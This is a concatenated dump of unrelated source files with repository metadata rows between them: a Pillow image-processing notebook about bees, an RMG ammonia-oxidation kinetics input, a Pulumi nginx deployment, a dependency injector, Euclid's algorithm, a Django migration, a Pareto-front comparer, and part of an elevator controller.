`color` must be a color string, e.g. 'r', 'g', or 'b'
"""
data = channel.flatten()
return pd.Series(data).plot.density(c=color)
# create the list of channels
channels = ['r', 'g', 'b']
def plot_rgb(image_data):
# use enumerate to loop over colors and indexes
for ix, color in enumerate(channels):
plot_kde(image_data[:, :, ix], color)
plt.show()
plot_rgb(img_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "38"}, "editable": false, "cell_type": "markdown"}
# # ## 6. Honey bees and bumble bees (i)
# # <p>Now we'll look at two different images and some of the differences between them. The first image is of a honey bee, and the second image is of a bumble bee.</p>
# # <p>First, let's look at the honey bee.</p>
# + {"tags": ["sample_code"], "dc": {"key": "38"}}
# load bee_12.jpg as honey
honey = Image.open('datasets/bee_12.jpg')
# display the honey bee image
display(honey)
# NumPy array of the honey bee image data
honey_data = np.array(honey)
# plot the rgb densities for the honey bee image
plot_rgb(honey_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "45"}, "editable": false, "cell_type": "markdown"}
# # ## 7. Honey bees and bumble bees (ii)
# # <p>Now let's look at the bumble bee.</p>
# # <p>When one compares these images, it is clear how different the colors are. The honey bee image above, with a blue flower, has a strong peak on the right-hand side of the blue channel. The bumble bee image, which has a lot of yellow for the bee and the background, has almost perfect overlap between the red and green channels (which together make yellow).</p>
# + {"tags": ["sample_code"], "dc": {"key": "45"}}
# load bee_3.jpg as bumble
bumble = Image.open('datasets/bee_3.jpg')
# display the bumble bee image
display(bumble)
# NumPy array of the bumble bee image data
bumble_data = np.array(bumble)
# plot the rgb densities for the bumble bee image
plot_rgb(bumble_data)
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "52"}, "editable": false, "cell_type": "markdown"}
# # ## 8. Simplify, simplify, simplify
# # <p>While sometimes color information is useful, other times it can be distracting. In this examples where we are looking at bees, the bees themselves are very similar colors. On the other hand, the bees are often on top of different color flowers. We know that the colors of the flowers may be distracting from separating honey bees from bumble bees, so let's convert these images to <a href="https://en.wikipedia.org/wiki/Grayscale">black-and-white, or "grayscale."</a></p>
# # <p>Grayscale is just one of the <a href="https://pillow.readthedocs.io/en/5.0.0/handbook/concepts.html#modes">modes that Pillow supports</a>. Switching between modes is done with the <code>.convert()</code> method, which is passed a string for the new mode.</p>
# # <p>Because we change the number of color "channels," the shape of our array changes with this change. It also will be interesting to look at how the KDE of the grayscale version compares to the RGB version above.</p>
# + {"tags": ["sample_code"], "dc": {"key": "52"}}
# convert honey to grayscale
honey_bw = honey.convert(mode="L")
display(honey_bw)
# convert the image to a NumPy array
honey_bw_arr = np.array(honey_bw)
# get the shape of the resulting array
honey_bw_arr_shape = honey_bw_arr.shape
print("Our NumPy array has the shape: {}".format(honey_bw_arr_shape))
# plot the array using matplotlib
plt.imshow(honey_bw_arr, cmap=plt.cm.gray)
plt.show()
# plot the kde of the new black and white array
plot_kde(honey_bw_arr, 'k')
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "59"}, "editable": false, "cell_type": "markdown"}
# # ## 9. Save your work!
# # <p>We've been talking this whole time about making changes to images and the manipulations that might be useful as part of a machine learning pipeline. To use these images in the future, we'll have to save our work after we've made changes.</p>
# # <p>Now, we'll make a couple changes to the <code>Image</code> object from Pillow and save that. We'll flip the image left-to-right, just as we did with the color version. Then, we'll change the NumPy version of the data by clipping it. Using the <code>np.maximum</code> function, we can take any number in the array smaller than <code>100</code> and replace it with <code>100</code>. Because this reduces the range of values, it will increase the <a href="https://en.wikipedia.org/wiki/Contrast_(vision)">contrast of the image</a>. We'll then convert that back to an <code>Image</code> and save the result.</p>
# + {"tags": ["sample_code"], "dc": {"key": "59"}}
# flip the image left-right with transpose
honey_bw_flip = honey_bw.transpose(method=Image.FLIP_LEFT_RIGHT)
# show the flipped image
display(honey_bw_flip)
# save the flipped image
honey_bw_flip.save("saved_images/bw_flipped.jpg")
# create higher contrast by reducing range
honey_hc_arr = np.maximum(honey_bw_arr, 100)
# show the higher contrast version
plt.imshow(honey_hc_arr, cmap=plt.cm.gray)
# convert the NumPy array of high contrast to an Image
honey_bw_hc = Image.fromarray(honey_hc_arr)
# save the high contrast version
honey_bw_hc.save("saved_images/bw_hc.jpg")
# + {"run_control": {"frozen": true}, "tags": ["context"], "deletable": false, "dc": {"key": "66"}, "editable": false, "cell_type": "markdown"}
# # ## 10. Make a pipeline
# # <p>Now it's time to create an image processing pipeline. We have all the tools in our toolbox to load images, transform them, and save the results.</p>
# # <p>In this pipeline we will do the following:</p>
# # <ul>
# # <li>Load the image with <code>Image.open</code> and create paths to save our images to</li>
# # <li>Convert the image to grayscale</li>
# # <li>Save the grayscale image</li>
# # <li>Rotate, crop, and zoom in on the image and save the new image</li>
# # </ul>
# + {"tags": ["sample_code"], "dc": {"key": "66"}}
image_paths = ['datasets/bee_1.jpg', 'datasets/bee_12.jpg', 'datasets/bee_2.jpg', 'datasets/bee_3.jpg']
def process_image(path):
img = Image.open(path)
# create paths to save files to
bw_path = "saved_images/bw_{}.jpg".format(path.stem)
rcz_path = "saved_images/rcz_{}.jpg".format(path.stem)
print("Creating grayscale version of {} and saving to {}.".format(path, bw_path))
bw = img.convert(mode="L")
bw.save(bw_path)
print("Creating rotated, cropped, and zoomed version of {} and saving to {}.".format(path, rcz_path))
rcz = img.rotate(45).crop(box=(25, 25, 75, 75)).resize((100, 100))
rcz.save(rcz_path)
# for loop over image paths
for img_path in image_paths:
process_image(Path(img_path))
| [
"forest.bremer@gmail.com"
] | forest.bremer@gmail.com |
4faf46f2328117f85bdcc81f35b2d0f81520a0e9 | b01646abacbef23719926477e9e1dfb42ac0f6a9 | /Rebrov/training/673K/673K_O088N0066_all_Pt111_libraries/input.py | 374655bca2c3f8ed6678fb4189e6d56c8b754ea8 | [] | no_license | Tingchenlee/Test | 41b0fd782f4f611d2b93fda6b63e70956881db33 | 37313c3f594f94cdc64c35e17afed4ae32d3e4e6 | refs/heads/master | 2023-06-02T05:38:32.884356 | 2021-06-10T11:59:02 | 2021-06-10T11:59:02 | 349,764,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,496 | py | # Microkinetic model for ammonia oxidation
# E.V. Rebrov, M.H.J.M. de Croon, J.C. Schouten
# Development of the kinetic model of platinum catalyzed ammonia oxidation in a microreactor
# Chemical Engineering Journal 90 (2002) 61–76
database(
thermoLibraries=['surfaceThermoPt111', 'surfaceThermoNi111', 'primaryThermoLibrary', 'thermo_DFT_CCSDTF12_BAC','DFT_QCI_thermo', 'GRI-Mech3.0-N', 'NitrogenCurran', 'primaryNS', 'CHON'],
reactionLibraries = ['Surface/CPOX_Pt/Deutschmann2006','Surface/Nitrogen','Surface/Arevalo_Pt111','Surface/Kraehnert_Pt111','Surface/Mhadeshwar_Pt111','Surface/Novell_Pt111','Surface/Offermans_Pt111','Surface/Rebrov_Pt111','Surface/Scheuer_Pt','Surface/Schneider_Pt111'],
seedMechanisms = [],
kineticsDepositories = ['training'],
kineticsFamilies = ['default'],
kineticsEstimator = 'rate rules',
)
catalystProperties(
metal = 'Pt111'
)
generatedSpeciesConstraints(
allowed=['input species','seed mechanisms','reaction libraries'],
maximumNitrogenAtoms=2,
maximumOxygenAtoms=3,
)
# List of species
species(
label='X',
reactive=True,
structure=adjacencyList("1 X u0"),
)
species(
label='O2',
reactive=True,
structure=adjacencyList(
"""
multiplicity 3
1 O u1 p2 c0 {2,S}
2 O u1 p2 c0 {1,S}
"""),
)
species(
label='H2O',
reactive=True,
structure=SMILES("O"),
)
species(
label='N2',
reactive=True,
structure=SMILES("N#N"),
)
species(
label='NO',
reactive=True,
structure=adjacencyList(
"""
multiplicity 2
1 N u1 p1 c0 {2,D}
2 O u0 p2 c0 {1,D}
"""),
)
species(
label='NH3',
reactive=True,
structure=adjacencyList(
"""
1 N u0 p1 c0 {2,S} {3,S} {4,S}
2 H u0 p0 c0 {1,S}
3 H u0 p0 c0 {1,S}
4 H u0 p0 c0 {1,S}
"""),
)
species(
label='N2O',
reactive=True,
structure=adjacencyList(
"""
1 N u0 p2 c-1 {2,D}
2 N u0 p0 c+1 {1,D} {3,D}
3 O u0 p2 c0 {2,D}
"""),
)
species(
label='He',
reactive=False,
structure=adjacencyList(
"""
1 He u0 p1 c0
"""),
)
#-------------
#temperature from 523-673K
surfaceReactor(
temperature=(673,'K'),
initialPressure=(1.0, 'bar'),
nSims=12,
initialGasMoleFractions={
"NH3": 0.066,
"O2": 0.88,
"He": 0.054,
"NO":0.0,
"H2O":0.0,
"N2O":0.0,
"N2":0.0,
},
initialSurfaceCoverages={
"X": 1.0,
},
surfaceVolumeRatio=(2.8571428e4, 'm^-1'), #A/V = 280µm*π*9mm/140µm*140µm*π*9mm = 2.8571428e4^m-1
terminationConversion = {"NH3":0.99,},
#terminationTime=(10, 's'),
)
simulator( #default for surface reaction atol=1e-18,rtol=1e-12
atol=1e-18, #absolute tolerance are 1e-15 to 1e-25
rtol=1e-12, #relative tolerance is usually 1e-4 to 1e-8
)
model(
toleranceKeepInEdge=0.01, #recommend setting toleranceKeepInEdge to not be larger than 10% of toleranceMoveToCore
toleranceMoveToCore=0.1,
toleranceInterruptSimulation=1e8, #This value should be set to be equal to toleranceMoveToCore unless the advanced pruning feature is desired
#to always enable pruning should be set as a high value, e.g. 1e8
maximumEdgeSpecies=5000, #set up less than 200000
minCoreSizeForPrune=50, #default value
#toleranceThermoKeepSpeciesInEdge=0.5,
minSpeciesExistIterationsForPrune=2, #default value = 2 iteration
)
options(
units='si',
saveRestartPeriod=None,
generateOutputHTML=True,
generatePlots=True,
saveEdgeSpecies=True,
saveSimulationProfiles=True,
) | [
"lee.ting@northeastern.edu"
] | lee.ting@northeastern.edu |
7d388507f08839af659b2f4775cbb45398f53517 | d28d5234b0256e54affcabc5a49a63c9c86cc3dc | /__main__.py | b0a27982f5300f2732c7ce0092e8b52a340afe23 | [] | no_license | somabc/kubernetes-nginx | 352191aa30407f107e15ad30f8e9a45942e32f60 | 0efd7a2065ef457d79878bd5a84f143ec6a3d8e5 | refs/heads/master | 2020-08-03T10:35:01.232045 | 2019-09-29T21:58:49 | 2019-09-29T21:58:49 | 211,721,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import pulumi
from pulumi_kubernetes.apps.v1 import Deployment
from pulumi_kubernetes.core.v1 import Service
# Minikube does not implement services of type `LoadBalancer`; require the user to specify if we're
# running on minikube, and if so, create only services of type ClusterIP.
config = pulumi.Config()
is_minikube = config.require_bool("isMinikube")
app_name = "nginx"
app_labels = { "app": app_name }
deployment = Deployment(
app_name,
spec={
"selector": { "match_labels": app_labels },
"replicas": 1,
"template": {
"metadata": { "labels": app_labels },
"spec": { "containers": [{ "name": app_name, "image": "nginx" }] }
}
})
# Allocate an IP to the Deployment.
frontend = Service(
app_name,
metadata={
"labels": deployment.spec["template"]["metadata"]["labels"],
},
spec={
"type": "ClusterIP" if is_minikube else "LoadBalancer",
"ports": [{ "port": 80, "target_port": 80, "protocol": "TCP" }],
"selector": app_labels,
})
# When "done", this will print the public IP.
if is_minikube:
pulumi.export("ip", frontend.spec.apply(lambda v: v["cluster_ip"] if "cluster_ip" in v else None))
else:
pulumi.export("ip", frontend.status.apply(lambda v: v["load_balancer"]["ingress"][0]["ip"] if "load_balancer" in v else None)) | [
"bryan@MacBook-Air.lan"
] | bryan@MacBook-Air.lan |
e2fd657eab66f4cff6903e8c631365e830e32956 | f4fbd41b0272c6161e9a2ffd793fb96631c3f20d | /aries_cloudagent/config/injector.py | 03fbe9195388cd861602f0b2e8e9012fd0eb92b9 | [
"Apache-2.0",
"LicenseRef-scancode-dco-1.1"
] | permissive | The-Insight-Token/aries-cloudagent-python | 946d8b7a2b0aa7a50be1a5a93c8c9caecadf6280 | c84c2615d6513a7ce30e71ae31f632ba112a2b1f | refs/heads/main | 2023-03-19T11:54:51.837163 | 2021-03-10T02:07:07 | 2021-03-10T02:07:07 | 346,390,951 | 1 | 0 | Apache-2.0 | 2021-03-10T14:53:52 | 2021-03-10T14:53:51 | null | UTF-8 | Python | false | false | 3,658 | py | """Standard Injector implementation."""
from typing import Mapping, Optional, Type
from .base import BaseProvider, BaseInjector, InjectionError, InjectType
from .provider import InstanceProvider, CachedProvider
from .settings import Settings
class Injector(BaseInjector):
"""Injector implementation with static and dynamic bindings."""
def __init__(
self, settings: Mapping[str, object] = None, *, enforce_typing: bool = True
):
"""Initialize an `Injector`."""
self.enforce_typing = enforce_typing
self._providers = {}
self._settings = Settings(settings)
@property
def settings(self) -> Settings:
"""Accessor for scope-specific settings."""
return self._settings
@settings.setter
def settings(self, settings: Settings):
"""Setter for scope-specific settings."""
self._settings = settings
def bind_instance(self, base_cls: Type[InjectType], instance: InjectType):
"""Add a static instance as a class binding."""
self._providers[base_cls] = InstanceProvider(instance)
def bind_provider(
self, base_cls: Type[InjectType], provider: BaseProvider, *, cache: bool = False
):
"""Add a dynamic instance resolver as a class binding."""
if not provider:
raise ValueError("Class provider binding must be non-empty")
if cache and not isinstance(provider, CachedProvider):
provider = CachedProvider(provider)
self._providers[base_cls] = provider
def clear_binding(self, base_cls: Type[InjectType]):
"""Remove a previously-added binding."""
if base_cls in self._providers:
del self._providers[base_cls]
def get_provider(self, base_cls: Type[InjectType]):
"""Find the provider associated with a class binding."""
return self._providers.get(base_cls)
def inject(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
*,
required: bool = True,
) -> Optional[InjectType]:
"""
Get the provided instance of a given class identifier.
Args:
cls: The base class to retrieve an instance of
params: An optional dict providing configuration to the provider
Returns:
An instance of the base class, or None
"""
if not base_cls:
raise InjectionError("No base class provided for lookup")
provider = self._providers.get(base_cls)
if settings:
ext_settings = self.settings.extend(settings)
else:
ext_settings = self.settings
if provider:
result = provider.provide(ext_settings, self)
else:
result = None
if result is None:
if required:
raise InjectionError(
"No instance provided for class: {}".format(base_cls.__name__)
)
elif not isinstance(result, base_cls) and self.enforce_typing:
raise InjectionError(
"Provided instance does not implement the base class: {}".format(
base_cls.__name__
)
)
return result
def copy(self) -> BaseInjector:
"""Produce a copy of the injector instance."""
result = Injector(self.settings)
result.enforce_typing = self.enforce_typing
result._providers = self._providers.copy()
return result
def __repr__(self) -> str:
"""Provide a human readable representation of this object."""
return f"<{self.__class__.__name__}>"
| [
"cywolf@gmail.com"
] | cywolf@gmail.com |
48b280c792bb3a5a48559a9809391800e32ec0a0 | af15b129708491741c7487dee671821fb9b4656b | /Python/2014/Euclides_con_combinacion_lineal.py | 580f2ea89ce0da07e18b204dd7012845f44571ff | [] | no_license | pdenapo/programitas-algebraI | ccfe67c44e9bc454704cc261a5f01e5f5d1b68fb | addb0f66f56fd6deebcb96226e489ba23c46993f | refs/heads/master | 2021-01-10T05:30:27.114128 | 2020-11-28T00:34:09 | 2020-11-28T00:34:09 | 53,788,303 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,761 | py | #!/usr/bin/env python3
# Programa en Python 3 que calcula el máximo común divisor
# usando el algoritmo de Euclides, y los coeficientes que permiten
# escribirlo como combinación lineal
# Este programa tiene solamente propósitos didácticos
# (es para mis alumnos de Algebra I).
# (C) 20014-2016 Pablo De Nápoli <pdenapo@dm.uba.ar>
# Este programa es software libre, y usted puede redistribuirlo o
# modificarlo libremente bajo los términos de la
# GNU General Public Licence (Licencia Pública General), versión 3
# o cualquier versión posterior,
# publicada por la Free Software Foundation. Vea:
#
# http://www.gnu.org/copyleft/gpl.html
import argparse
def chequea_invariante(a,b,alfa_a_b,beta_a_b,mcd_a_b):
# chequea el invariante del algoritmo
print("alfa(",a,",",b,")=",alfa_a_b,end=', ')
print("beta(",a,",",b,")=",beta_a_b,end=', ')
print("mcd(",a,",",b,")=",mcd_a_b)
print(mcd_a_b,"=",alfa_a_b,"*",a,"+",beta_a_b,"*",b)
def mcd_con_combinacion_lineal(a,b):
if b>a:
return mcd_con_combinacion_lineal(b,a)
if b==0:
alfa_a_b=1
beta_a_b=0
mcd_a_b=a
else:
q,r=divmod(a,b)
alfa_b_r, beta_b_r, mcd_b_r = mcd_con_combinacion_lineal(b,r)
alfa_a_b = beta_b_r
beta_a_b = alfa_b_r - beta_b_r * q
mcd_a_b = mcd_b_r
chequea_invariante (a,b,alfa_a_b,beta_a_b,mcd_a_b)
return (alfa_a_b,beta_a_b,mcd_a_b)
parser = argparse.ArgumentParser(description='Calcula el máximo común divisor usando el algoritmo de Euclides y lo escibe como una combinación lineal')
parser.add_argument("a", type=int)
parser.add_argument("b", type=int)
args=parser.parse_args()
print("Calculamos el máximo común divisor entre ",args.a," y ",args.b)
mcd_con_combinacion_lineal(args.a,args.b)
| [
"pdenapo@gmail.com"
] | pdenapo@gmail.com |
190f9f2f9798cb06301f039f6a63c347cd66d097 | f3ee39e1b9ffd2c51795757111adbaa87b4c7e43 | /index/migrations/0003_auto_20151226_1046.py | 08562129d38d555344e1bd7730161dbbc24ca7ca | [] | no_license | BJChen990/hygiene | 8c2b20cb1c58355f97f947dad21fe9206c2bc8bf | 59b1463beed41529c5c4dc69cba722f6d93fbd09 | refs/heads/master | 2016-09-01T09:01:11.918958 | 2016-01-14T14:10:00 | 2016-01-14T14:10:00 | 48,559,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-26 10:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('index', '0002_auto_20151226_1022'),
]
operations = [
migrations.AlterField(
model_name='student',
name='date_schedule',
field=models.TextField(default='{}', max_length=60),
),
]
| [
"bengjing@gmail.com"
] | bengjing@gmail.com |
e04368a99906c0e1b506b2c4d9fa8333b1f36969 | d6022256f47ba67b5ef82bb6d29572841ac47121 | /hw1d/CompareParetoFronts.py | 00c6f7df59ca07dbf11b507b9decbbaa798e3722 | [] | no_license | Jmgiacone/CS5401 | 7633ff15e8c835a733295ae9a0ba1a4451a90773 | 2c280fff54c16122032ed9211358b207c3747d7c | refs/heads/master | 2020-05-20T17:13:36.330555 | 2017-03-09T22:23:49 | 2017-03-09T22:23:49 | 84,492,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,935 | py | import sys
class Genome:
def __init__(self, id, wall_time=0, memory_usage=0, decisions=0):
self.objectives = {"wall_time": wall_time, "memory_usage": memory_usage, "decisions": decisions}
self.id = id
def dominates(self, other_item):
if self != other_item and self.objectives["wall_time"] >= other_item.objectives["wall_time"] \
and self.objectives["memory_usage"] >= other_item.objectives["memory_usage"] \
and self.objectives["decisions"] >= other_item.objectives["decisions"]:
if self.objectives["wall_time"] == other_item.objectives["wall_time"] \
and self.objectives["memory_usage"] == other_item.objectives["memory_usage"] \
and self.objectives["decisions"] == other_item.objectives["decisions"]:
return False
else:
return True
return False
def __str__(self):
return "{}: ({}, {}, {})".format(self.id, self.objectives["wall_time"], self.objectives["memory_usage"],
self.objectives["decisions"])
def __repr__(self):
return self.__str__()
def front1_better_than_front2(front1, front2):
front1_dominates = 0
front2_dominates = 0
for genome1 in front1:
for genome2 in front2:
if genome1.dominates(genome2):
front1_dominates += 1
break
for genome2 in front2:
for genome1 in front1:
if genome2.dominates(genome1):
front2_dominates += 1
break
front1_ratio = front1_dominates / len(front2)
front2_ratio = front2_dominates / len(front1)
return front1_ratio > front2_ratio
def parse_file_to_genome_list(file_in):
x = 0
genome_list = [[]]
for line in file_in:
if line == "\n":
x += 1
genome_list.append([])
elif line[0] != "R":
line = line.rstrip("\n")
genome = Genome(1)
split_list = line.split("\t")
genome.objectives["wall_time"] = float(split_list[0])
genome.objectives["memory_usage"] = float(split_list[1])
genome.objectives["decisions"] = float(split_list[2])
genome_list[x].append(genome)
return genome_list
def measure_diversity(front):
return measure(front, ["wall_time", "memory_usage", "decisions"],
{"wall_time": -150, "memory_usage": -100000, "decisions": 0},
{"wall_time": 100, "memory_usage": 10000, "decisions": 100000})
def measure(front, objectives, mins, maxs):
"""
Calculates the normalized hyper-volume between each point on a Pareto front and its neighbors
Returns the percentage of the total normalized volume NOT taken up by these volumes
A higher return value corresponds to a better distributed Pareto front
front: non-empty list of class objects with an objectives dictionary member variable
objectives: list of objective names (needs to match what's in the individual's objectives dictionary)
mins: dictionary with objective names as keys and the minimum possible value for that objective as values
maxs: dictionary with objective names as keys and the maximum possible value for that objective as values
"""
# This will store the hyper-volume between neighboring individuals on the front; initialize all volumes to 1
volumes = {individual: 1.0 for individual in front}
# There is one more volume of interest than there is points on the front, so associate it with the max value
volumes['max'] = 1.0
for objective in objectives:
# Sort the front by this objective's values
sorted_front = sorted(front, key=lambda x: x.objectives[objective])
# Calculate the volume between the first solution and minimum
volumes[sorted_front[0]] *= float(sorted_front[0]
.objectives[objective]-mins[objective]) / (maxs[objective]-mins[objective])
# Calculate the volume between adjacent solutions on the front
for i in range(1, len(sorted_front)):
volumes[sorted_front[i]] *= float(sorted_front[i].objectives[objective]-sorted_front[i-1]
.objectives[objective]) / (maxs[objective]-mins[objective])
# Calculate the volume between the maximum and the last solution
volumes['max'] *= float(maxs[objective]-sorted_front[-1]
.objectives[objective]) / (maxs[objective]-mins[objective])
# The normalized volume of the entire objective space is 1.0, subtract the volumes we calculated to turn this into
# maximization
return 1.0 - sum(volumes.values())
if len(sys.argv) != 3:
print("Error")
exit(1)
print("Param 1: {}\nParam 2: {}".format(sys.argv[1], sys.argv[2]))
file1 = open(sys.argv[1], "r")
file2 = open(sys.argv[2], "r")
genome_list_1 = parse_file_to_genome_list(file1)
genome_list_2 = parse_file_to_genome_list(file2)
win_ratio_genome_1 = []
win_ratio_genome_2 = []
for run1 in genome_list_1:
wins_1 = 0
for run2 in genome_list_2:
if front1_better_than_front2(run1, run2):
wins_1 += 1
win_ratio_genome_1.append(wins_1 / len(genome_list_2))
for run2 in genome_list_2:
wins_2 = 0
for run1 in genome_list_1:
if front1_better_than_front2(run2, run1):
wins_2 += 1
win_ratio_genome_2.append(wins_2 / len(genome_list_1))
print("\n{}".format(sys.argv[1]))
for wins1 in win_ratio_genome_1:
print(wins1)
print("\n{}".format(sys.argv[2]))
for wins2 in win_ratio_genome_2:
print(wins2)
print("\nFront 1")
for run in genome_list_1:
print("Diversity: {}".format(measure_diversity(run)))
print("\nFront 2")
for run in genome_list_2:
print("Diversity: {}".format(measure_diversity(run)))
| [
"Jmgiacone@gmail.com"
] | Jmgiacone@gmail.com |
5c39f86e48d1800b1cb52805192385f0e3cf3fc5 | 9df1784a03e1a29ce280234c85b4cdb9074bb5ce | /uglyFinish/slaveMain.py | 3ea82e27be98fea8f567af493a2ea06c0e0475b5 | [] | no_license | haakoneh/TTK4145_Project | 1542b8b92645ff647e838072de4134635ffb3c8c | 541e67f40b567588aeae81a995cd2fadf83d7ba8 | refs/heads/master | 2021-01-10T11:00:50.398997 | 2017-03-07T11:57:47 | 2017-03-07T11:57:47 | 55,074,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py | from elev import Elevator
import request_list
from request_list import Request_List
from channels import INPUT, OUTPUT
from elevator_panel import Elevator_Panel
from timer import *
import time
import slaveNetwork
from globalFunctions import *
from MessageFormatHandler import *
from colors import *
# NOTE(review): not referenced in this chunk of the file; presumably toggled
# by the network layer to signal link loss — confirm against slaveNetwork.
networkAliveFlag = True
# Status text accumulated during one pass of the main loop; compared against
# prevPrintString so identical output need not be re-printed every iteration.
printString = ""
prevPrintString = ""
def openDoor(timer, elevator):
    """Stop the cab at the requested floor and open the doors.

    Restarts the door timer so the doors stay open for a full period, halts
    the motor, and lights the door-open lamp.  Progress messages are appended
    to the module-wide printString log.
    """
    global printString
    printString += "\nAt requested floor"
    # Restart the open-door countdown before stopping the cab.
    timer.resetTimer()
    elevator.stop()
    printString += "\nDoors open"
    elevator.setDoorLamp(1)
def sendState(elev, requestList, prevState, msgEncoder, msgBuffer):
    """Report the elevator's state to the master when it has changed.

    The state is [current floor, motor direction, furthest requested floor]
    followed by the global (hall) requests known locally.  When the state
    differs from prevState, an encoded "state" message is queued on
    msgBuffer (skipping exact duplicates already queued).

    Returns the (possibly extended) msgBuffer and the latest sent state.
    """
    global printString
    floor = elev.getCurrentFloor()
    # An idle elevator reports MOTOR_STOP regardless of the last direction.
    if requestList.isRequests():
        direction = elev.getMotorDirection()
    else:
        direction = OUTPUT.MOTOR_STOP
    target = requestList.furthestRequestThisWay()
    state = [floor, direction, target] + requestList.getGlobalFromLocal()
    if state != prevState:
        prevState = state
        msg = msgEncoder.encode("state", prevState)
        if msg not in msgBuffer:
            printString += "\nnewState"
            msgBuffer.append(msg)
    return msgBuffer, prevState
def updatePendingRequests(requestList, newData):
    """Completely replace the pending-request backlog with the master's data.

    The original implementation rebound the local name ``requestList``, which
    is a no-op for the caller: rebinding a parameter never affects the
    argument object.  To actually apply the master's update we must mutate
    the Request_List in place.  Request_List keeps its entries in ``.list``
    (runElevator reads ``pendingRequests.list``), so overwrite that attribute.

    NOTE(review): assumes ``newData`` is the raw list of requests pushed by
    the master — confirm against the master-side message format.
    """
    requestList.list = newData
def stopAndRemoveRequests(elev, msgBuffer, msgEncoder, requestList):
    """Clear the requests served at the current floor and notify the master.

    For every non-cabin (hall) request removed at this floor, a
    "removePending" message is queued so the master can drop it from its
    pending set.  Returns the (possibly extended) message buffer.
    """
    hallRequests = requestList.removeAndReturnRequestsForDirection(elev.current_floor)
    print "hallRequests: ", hallRequests
    for request in hallRequests:
        # request[0] == INPUT.BUTTON_IN marks a cabin button press, which the
        # master does not track, so only hall requests are reported.
        if request and request[0] != INPUT.BUTTON_IN:
            print "sending remove message to master:\n\tmsg: {}".format(msgEncoder.encode("removePending", request))
            msg = msgEncoder.encode("removePending", request)
            # Skip duplicates already waiting in the outgoing buffer.
            if(msg not in msgBuffer):
                msgBuffer.append(msgEncoder.encode("removePending", request))
    print '\033[93m' + "in stopandremove\nmsgBuffer: {}".format(msgBuffer) + '\033[0m'
    return msgBuffer
def runElevator(masterIP, port):
    """Main slave control loop: drive one elevator and talk to the master.

    Sets up the hardware wrapper, the local/global/pending request lists and
    the network slave, then loops forever: collect button presses, exchange
    request/state messages with the master, stop at floors with matching
    requests, manage door timing, and choose the next motor direction.
    """
    global printString, prevPrintString
    slave = slaveNetwork.Slave(masterIP, port)
    elevIP = getMyIP()
    elev = Elevator()
    elevPanel = Elevator_Panel(elev)
    elevPanel.turnOffAllLights()
    # Requests are persisted to files so they survive a process restart.
    requestList = Request_List(elev, 'requestListFile.txt')
    globalRequestList = Request_List(elev, 'globalRequestListFile.txt')
    pendingRequests = Request_List(elev, 'pendingRequests.txt')
    # Re-adopt any pending requests left over from a previous run.
    requestList.addListToRequestList(pendingRequests.list)
    floorStopTimer = TimerElev()
    msgEncoder = MessageEncoder()
    msgParser = MessageParser()
    msgBuffer = []
    prevState = [-1, -1, -1]
    elev.setSpeed(300)
    currentFloor = -1
    # Drive until a floor sensor triggers so we start from a known position.
    while elev.getFloorSensorSignal() == -1:
        time.sleep(0.1)
    if ((elev.getFloorSensorSignal() != currentFloor)):
        currentFloor = elev.getFloorSensorSignal()
        printString += "\n" + "elev.curr: " + str(currentFloor) + " getfloor: " + str(elev.getFloorSensorSignal())
    # Announce the initial state to the master.
    prevState = [elev.getCurrentFloor(), elev.getMotorDirection(), 0]
    msg = msgEncoder.encode("state", prevState)
    msgBuffer.append(msg)
    elev.stop()
    while slave.alive:
        if connectionLost(elevIP): break
        printString = ""
        #check for request
        requestList.addRequest()
        printString += "\nglobal list:\n{}\n\n".format(requestList.globalList)
        """This is where we send requests to master"""
        globalRequest = requestList.getGlobalRequest()
        if globalRequest:
            msg = msgEncoder.encode("request", globalRequest)
            if not msg in msgBuffer:
                msgBuffer.append(msg)
                printString += "\n" + "Slave sending: {}".format(msg)
        msgBuffer, prevState = sendState(elev, requestList, prevState, msgEncoder, msgBuffer)
        """recieve from master"""
        printString += "\n \t\t\tID: {}".format(slave.getSlaveID())
        receivedMessage = slave.receive()
        # NOTE(review): the format string below has no {} placeholder, so the
        # received message is never actually printed — confirm intent.
        print "recievedMessage: ".format(receivedMessage)
        if receivedMessage != None and receivedMessage != " ":
            try:
                masterMessage = json.loads(receivedMessage)
            except:
                # Unparseable data is treated as a lost master connection.
                cprint("json.loads error", WARNING)
                slave.handleLossOfMaster()
                continue
            #printString += "\n" + 'masterMessage: ' + str(masterMessage['msgType'])
            if masterMessage['msgType'] == 'request':
                #printString += "Recieved global request from master {}".format(masterMessage["content"])
                printString += "Recieved global request from master {}".format(masterMessage["content"])
                """change this function to do smart stuf"""
                #requestList.addGlobalRequest(request)
                # Content arrives as a space-separated string of ints.
                requestList.addGlobalRequest(map(int, masterMessage['content'].split(' ')))
            elif masterMessage['msgType'] == 'elev_id':
                if slave.getSlaveID() != int(masterMessage['content']):
                    slave.setSlaveID(int(masterMessage['content']))
            #New stuff related to pending request added here
            #######################################################
            elif masterMessage['msgType'] == 'pendingRequests':
                # Master pushes a fresh pending list; replace ours and persist.
                print "\n\t\t\t****pendingRequests: {}".format(pendingRequests.list)
                msg = msgParser.parse(masterMessage)
                print "msgtype == pending, masterMessage: {}\nmasterMessage parsed: {}".format(masterMessage, msg)
                pendingRequests.list = msg
                print "\n\t\t\t****pendingRequests: {}".format(pendingRequests.list)
                updatePendingRequests(pendingRequests, pendingRequests.list)
                print "\nAttempting to update pending requestfile"
                pendingRequests.updateRequestFile()
            elif masterMessage["msgType"] == "slaveLost":
                # Another slave died: adopt its pending requests locally.
                # NOTE(review): these format strings lack {} placeholders, so
                # the lists are not actually shown — confirm intent.
                cprint("slaveLost:\nRequestlist before merge: ".format(requestList.list), BLUE)
